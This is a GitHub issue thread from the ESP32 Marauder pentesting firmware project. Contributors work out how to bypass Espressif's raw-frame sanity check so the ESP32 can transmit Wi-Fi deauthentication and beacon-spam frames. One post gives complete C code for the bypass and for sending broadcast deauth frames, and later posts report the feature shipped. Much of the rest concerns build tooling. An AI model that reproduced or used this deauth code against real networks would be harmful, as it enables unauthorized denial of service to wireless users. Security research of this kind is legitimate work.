justcallmekoko/ESP32Marauder #87: On the need of an external ESP8266

DonBrus, 2021-07-19:
Hello,
recent modifications and ToDos on the Marauder's firmware mention the future integration of an ESP8266 to compensate for the QoS-related functions that have been "prohibited" in the ESP-IDF toolchain, despite the ESP32 being fully capable of sending such frames, for example aimed to deauthentication attacks testing.

I find personally the redundant use of a whole additional microcontroller just to compensate for toolchain related restrictions a bit overkill, especially if the device is to be used as a portable tool, as it will surely have an impact on the battery, not mentioning increased complexity of the software and the device itself.

Have you already considered the possibility of using a solution as described here: https://github.com/GANESH-ICMC/esp32-deauther , i.e. applying a patch at posteriori to allow for the free use of said functions?

tobozo, 2021-07-19:
the "patching" can be applied at runtime too, and even without this it's still possible to [bypass](https://github.com/risinek/esp32-wifi-penetration-tool) this limitation

justcallmekoko, 2021-07-19:
## Patch Method Sanity Check
@DonBrus @tobozo I am very open to the idea of getting this patch to work with the Marauder. I have heard of this method but I have never put it into practice. I am not familiar with the process of installing a specific version of the ESP-IDF.

If I understand correctly, once you install ESP-IDF version 4.1, you just have to make sure  you have,
```C++
int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
    return 0;
}
```
Then you must use `esp_wifi_80211_tx` to transmit frames.

Last thing would be to make sure you compile using the flags that allow you to have function redefinitions.

Please let me know if my understanding of this process is correct.

## ESP32 Marauder Implementation
Because of my future plans with the Marauder and the current development of the Marauder kit, I want to make sure this is something that can continue to be built using the Arduino IDE. This is important to me because I want this to be relatively simple for the end user. Is this patch something that could be performed in such a way that it can be built and flashed with the Arduino IDE.

## PS.
I really appreciate the input and suggestions. I want to push hard on this. Deauthentication (and boundless frame transmissions in general) is one of the biggest features the Marauder is missing. If we can get free frame transmission working, the Marauder will be one tough cookie.

justcallmekoko, 2021-07-19:
> @justcallmekoko looks like the wsl bypass is just about [fooling the compiler](https://github.com/risinek/esp32-wifi-penetration-tool/blob/master/components/wsl_bypasser/wsl_bypasser.c#L38)

@tobozo I agree. They are just replacing the original function with a function of the same name that always returns in such a way that allows a frame to be transmitted.

DonBrus, 2021-07-19:
Exactly, normally multiple definitions of the same function with the same signature in C wouldn't be allowed (except for weak functions, used e.g. in interrupt callbacks), but those flags allow that. In the past it was necessary to modify the binary to branch to a differently defined exit value (iirc), this solution is imho more elegant; that being said, unfortunately both solutions are prone to be broken by feature releases of esp-idf. 
Unfortunately espressif had made some time back a statement about allowing the free use of such functions, as they apparently weren't too happy with the notoriety of ESP8266 as a deauthing tool, <rant>although I can't honestly agree with this decision, as bad agents will always find a way to make use of hw to their will, with the only results that regular users are unjustifiably limited in the development possibilities, which could instead ehnance the overall experience with this platform. Besides free QoS frames do not ONLY include deauth frames...</rant>

As for what concerns the use of the Arduino framework, unfortunately the [latest release of arduino-esp32](https://github.com/espressif/arduino-esp32/releases/tag/1.0.6) is still at IDF 3.3, and to my knowledge they're proceding quite slowly in that sense. I personally had already problems with discrepances between IDF 4.1 and the arduino component for esp32, which is a shame as a lot of fixes and features have been heavily added to later versions of esp-idf.
A possibility that you'd have in that sense is to switch from the official arduino-esp32 + Arduino IDE, to [integrating instead the preinstalled esp-idf framework in PlatformIO in the Arduino framework](https://community.platformio.org/t/using-esp-idf-library-within-the-arduino-framework-esp32/17226/2), which would keep the best of both worlds. 

I can understand the reluctancy in abandoning the Arduino-IDE when thinking about the end users, but some things must be said on that decision:

- although platformIO is far from perfect, it's way more powerful than the Arduino IDE, while also keeping a high intuitivity of use and flexibility, offering basically the same base function of the Arduino IDE (board manager, library manager, and so on) but adding to that a better management of projects, which will be 100% needed as you go on increasing this project's complexity
- debug possibilities. nuff' said
- generally speaking the possibility of working with latest releases of ESP-IDF, as already said, instead of waiting who knows how much until espressif reaches maturity with the Arduino official port. The project doesn't have to be always ready for rolling releases of the framework, of course, but a _lot_ of basic functions have been added in the 4.x versions, which often touch essential parts of the hardware and peripherals.

I'm in no way an expert on this topics but I had the occasion to make the jump to platformio a while back, as well as working only with esp-idf (on eclipse, as recommended by espressif), and both installations and usages were pretty painless and foolproof. In this sense, the advantages of (possibly slowly) abandoning arduino ide greatly outweight the cons.

tobozo, 2021-07-19:
> As for what concerns the use of the Arduino framework, unfortunately the latest release of arduino-esp32 is still at IDF 3.3

well the latest *stable* release is still at IDF 3.3, but there's an alpha pre-release that appears to be using IDF 4.4, it still needs a couple of patches to fix some linkage problems though.

[image]

justcallmekoko, 2021-07-19:
@DonBrus I will look into getting spun up on PlatformIO if it will actually allow me to specify a version of esp-idf I would like to use. Hopefully it also allows specifying the build options like `-Wl,-zmuldefs`.

Also are either of you familiar with uploading firmware and SPIFFS images to the ESP32 using the esptool? I was trying to find a way for the end user to just upload the prebuilt firmware bin without having to use an IDE at all.

I had a proposed solution [here](https://github.com/justcallmekoko/ESP32Marauder/issues/88) but it still involves building firmware. It's much simpler firmware and doesn't require as much IDE setup, but still...

DonBrus, 2021-07-19:
@tobozo didn't know that, thanks for the info, hopefully they manage to get it fixed soon enough! I was afraid we'd have to wait ages until that framework would be able to catch up with esp-idf..

@justcallmekoko specifying flags should be a no brainer, to be fair it should be relatively easy to do it in the arduino IDE too, as compiler/linker flags **should** be editable in the main settings. Can't remember for sure too, as I never did it in there.

> Also are either of you familiar with uploading firmware and SPIFFS images to the ESP32 using the esptool?
I find the idea of packing everything together and just flash it very useful for end users, I used esptool for spiffs a couple of times, but never attempted to "pack" the filesystem inside a macro-blob. Theoretically speaking it should be possible to write everything at once by specifying what goes where in the partition table, [like you would do when using the standalone flasher](http://iot-bits.com/esp32/esp32-flash-download-tool-tutorial/). Iirc however SPIFFS is mainly used when you want to have a filesystem (like FAT for example) in which you can do runtime operations, for example logging something in the flash memory. If you intend to use SPIFFS just for pictures, it might be worth to convert them to bytecode, which can be loaded by various library functions exactly as you would do with SPIFFS.
Sorry if there's more to the intended SPIFFS usage than what I just described, it's been quite some time since I last tinkered with your code.

tobozo, 2021-07-19:
@justcallmekoko Flashing from the browser seems possible, so what about "just visit the Marauder Flash Page" ?

https://blog.toit.io/flash-your-esp32-from-the-browser-using-web-serial-5eccb1483b9c

justcallmekoko, 2021-07-19:
>If you intend to use SPIFFS just for pictures, it might be worth to convert them to bytecode, which can be loaded by various library functions exactly as you would do with SPIFFS.
This could be done. I don't remember how exactly to do this but it would be helpful.

@DonBrus It looks like in order to specify arguments for the Arduino IDE, you would do it in the platform text files.

@tobozo I could use OTA, but for the initial firmware upload, it would still involve flashing the ESP32 with OTA firmware the first time they use it. At least with this method, they don't NEED to buy an SD card to finish flashing the Marauder firmware.

justcallmekoko, 2021-07-19:
If I figure out a way to convert the Marauder logo into bytecode, there would be no need to get the end user to install the SPIFFS tool. I know how to convert the jpg to byte code, but I am not quite sure how to actually feed that bytecode into the JPEG library I am using to get it to display.

tobozo, 2021-07-19:
LovyanGFX has built-in decoders for jpeg, png, bmp, and it has been [tested with lvgl](https://macsbug.wordpress.com/2021/06/18/how-to-run-lvgl-on-m5stack-esp32/) (although this test does not implement touch), so that would be as simple as `tft->drawJpg( array, array_len, position_x, position_y );` minus the bloat from including modular image decoders.

justcallmekoko, 2021-07-20:
It worked. I loaded the picture as a byte array and got it to display. I actually ended up with 1K more bytes of memory left over

justcallmekoko, 2021-07-20:
I am going to be following [this](https://diyprojects.io/migrate-project-arduino-ide-platformio-esp32-esp8266-esp01/) process for getting the project migrated over from Arduino IDE to Platformio.

justcallmekoko, 2021-07-20:
I probably need some more clarification since I actually have not built this yet. The switch options that allow multiple definitions for a function are for actually building the firmware, correct? Like when I go to compile the Marauder source, I would specify those switch options?

I am also curious to see what compatibility issues I run into when switching idf versions.

tobozo, 2021-07-20:
it's not really a migration if you end up keeping the Arduino C++ layer :wink: .
Careful though as the Arduino SDK 2.0.0-alpha (the one with esp-idf 4.4) [doesn't seem to work out of the box with platformio](https://community.platformio.org/t/esp32-arduino-platformio-support-for-2-0-0-version/21745/3) so you'd have to go full esp-idf (no Arduino SDK) to get it to work, or be ready to manually patch the sdk to fix those tools and linkage problems.

tobozo, 2021-07-20:
[oh, right](https://github.com/espressif/arduino-esp32/releases/tag/2.0.0-rc1)

DonBrus, 2021-07-21:
> I probably need some more clarification since I actually have not built this yet. The switch options that allow multiple definitions for a function are for actually building the firmware, correct? [...]

Yes those are flags that are used during linking, so once the firmware is compiled there are no more caveats to take care of.
Regarding the compatibility issues, you might want take a quick look to changelogs between releases, although in my experience I always had problems (as expected) with backward compatibility, I can't recall facing issues when updating the IDF version.
In any case I will also try the whole process out as soon as I have time, namely trying to compile the Marauder code on platformio with ESP-IDF 4.1 or upward, with linker flags. 

Pretty sure one of you is going to beat me to it though, as I won't have an available computer for around 10 days, lol

justcallmekoko, 2021-07-21:
> Pretty sure one of you is going to beat me to it though, as I won't have an available computer for around 10 days, lol

lol I sure hope I beat you then. If I can't manage to get platformio just working with the Marauder project as it is now, I think I should just quit computers.

justcallmekoko, 2021-07-21:
If not with platformio, can we see if we can get this working the same way they do [here](https://github.com/risinek/esp32-wifi-penetration-tool/tree/master/components/wsl_bypasser) just using `idf.py`?

justcallmekoko, 2021-07-22:
Ok well I just spent about 2 hours trying to get the marauder source to build in platformio and I got no where. I think there is an issue with the esp-idf version and idk how to change it in platformio.

justcallmekoko, 2021-07-22:
@DonBrus @tobozo I might have time today to actually work on this and maybe get a hello world something running with esp-idf framework instead of arduino framework

tobozo, 2021-07-22:
Careful with SD and arduino-esp32-2.0.x as `fs::File->name()` has a new behaviour, it now only returns the basename of the file, and you must use the new `fs::File->path()` method to get the full path.

Best is probably to get rid of Arduino dependency with SD e.g. by using `esp_vfs_fat.h` and all the C methods instead of the C++ wrapped.

The all that's left are the display driver and the wifi, which can also easily be replaced by their C counterpart.

I'm not sure for TFT_eSPI though, it seems to be depending on SPI library and may not work in the latest esp-idf even with arduino as a component.

justcallmekoko, 2021-07-22:
> I'm not sure for TFT_eSPI though, it seems to be depending on SPI library and may not work in the latest esp-idf even with arduino as a component.

This makes it sound like too much work if I can't get Arduino as Component working.

justcallmekoko, 2021-07-23:
So I managed to actually get ESP-IDF versions 4.2 installed on Platformio and I am running a demo to send a couple of deauth frames. I see that the sanity check bypass is being called successfully, but I am not getting any deauths showing up on wireshark. Here is my code. Let me know if there is something I am missing...
```C++
#include <stdio.h>
#include "sdkconfig.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_log.h"
#include "esp_err.h"
#include "esp_system.h"
#include "esp_spi_flash.h"
#include "esp_wifi.h"
#include "esp_wifi_types.h"

static uint8_t original_mac_ap[6];

const wifi_promiscuous_filter_t filt = {.filter_mask=WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA};

static const uint8_t deauth_frame_default[] = {
    0xc0, 0x00, 0x3a, 0x01,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xf0, 0xff, 0x02, 0x00
};

static void wifi_event_handler(void *event_handler_arg, esp_event_base_t event_base, int32_t event_id, void *event_data){

}

int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
    printf("Sanity check bypass called!\n");
    return 0;
}

void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){
    esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false);
}

static void wifi_init_apsta(){

    wifi_init_config_t wifi_init_config = WIFI_INIT_CONFIG_DEFAULT();

    esp_wifi_init(&wifi_init_config);
    esp_wifi_set_promiscuous_filter(NULL);
    esp_wifi_set_promiscuous(true);
    esp_wifi_set_max_tx_power(78);
    esp_wifi_set_storage(WIFI_STORAGE_RAM);
    esp_wifi_set_mode(WIFI_MODE_APSTA);
    esp_wifi_set_channel(11, WIFI_SECOND_CHAN_NONE);

    esp_wifi_start();
}

void app_main(void)
{
    printf("Hello world!\n");

    
    printf("ESP-IDF version is: ");
    printf(esp_get_idf_version());
    printf("\n");

    wifi_init_apsta();

    sleep(0.1);

    for (int i = 0; i < 10; i++) {
        printf("Sending deauth...\n");
        wsl_bypasser_send_raw_frame(deauth_frame_default, sizeof(deauth_frame_default));
        sleep(1);
    }

    for (int i = 10; i >= 0; i--) {
        printf("Restarting in %d seconds...\n", i);
        vTaskDelay(1000 / portTICK_PERIOD_MS);
    }
    printf("Restarting now.\n");
    fflush(stdout);
    esp_restart();
    
}
```

tobozo, 2021-07-23:
don't add debug code in those functions, some are carefully sized to match their counterpart, so this may be the reason it's not working:

    printf("Sanity check bypass called!\n");

also [triple check your cmakelist flags](https://github.com/risinek/esp32-wifi-penetration-tool/blob/master/components/wsl_bypasser/CMakeLists.txt),

justcallmekoko, 2021-07-23:
> don't add debug code in those functions, some are carefully sized to match their counterpart, so this may be the reason it's not working:
>
> ```
> printf("Sanity check bypass called!\n");
> ```
>
> also [...]

@tobozo I first ran it WITHOUT `printf("Sanity check bypass called!\n");` and it did not work. I only added that printf to make sure my sanity check was being called instead of the original (which it is). 

I also verified my cmakelist flags by removing `-zmuldefs` and it complained about multiple definitions of the same function. I added the flag back to my cmakelist and it compiled properly. 

So the bypass is working. The only thing I can see being a problem is the fact that I am on ESP-IDF version 4.2 and not 4.1...but the bypass is still being called.

tobozo, 2021-07-23:
there's [another function](https://github.com/virtualabs/hackwatch/blob/master/main/wifi/wifi.c#L51) you can target eventually

justcallmekoko, 2021-07-23:
> there's [another function](https://github.com/virtualabs/hackwatch/blob/master/main/wifi/wifi.c#L51) you can target eventually

Interesting. I wonder why they wrote their own `esp_wifi_80211_tx_`. They didn't feel the need to do that [here](https://github.com/risinek/esp32-wifi-penetration-tool) apparently.

tobozo, 2021-07-23:
same as the other approach, ghidra was used to spot the asm code and the function mimics its original counterpart, the asm statements are here to provide a match with the original function probably to satisfy external JMP requirements

justcallmekoko, 2021-07-23:
So why don't they do that in the original repo where they introduce this bypass? Just curious. I want to understand this as much as possible for when it comes time to integrate this with the marauder firmware if it's even possible.

tobozo, 2021-07-23:
good question, maybe they just used a diifferent strategy and targeted the simpler function to reduce work in ghidra ?

justcallmekoko, 2021-07-23:
Either way, I am probing the author of the ESP32 Pentesting Tool repo for information. For now, I can be happy that I even got this far into platformio. Maybe I can graduate from Arduino and start developing firmware like a big boy.

justcallmekoko, 2021-07-24:
I can't even get a prewritten wifi beacon spam example to transmit. It compiles and uploads but still nothing being transmitted...

[this one](https://github.com/Jeija/esp32-80211-tx)

justcallmekoko, 2021-07-24:
@tobozo @DonBrus So interesting development...I installed a beta version of arduino-esp32 in the Arduino IDE, added `-zmuldefs` to the compiler flags, defined `extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3)`, and compiled the ESP32 Marauder firmware.

I added a little debugging `printf` in the sanity check bypass function just to see if it would get called. I ran one of the beacon spam functions in the Marauder and the bypass was getting called. I haven't testing deauths yet, but it looks like the sanity check bypass is working in Arduino IDE on ESP-IDF version 4.4.

Will come back with more later.

justcallmekoko, 2021-07-24:
Got his change fully integrated into the Marauder source and everything is working properly. I published a new [release](https://github.com/justcallmekoko/ESP32Marauder/releases/tag/v0.9.3) this morning.

closed 2021-07-24 by justcallmekoko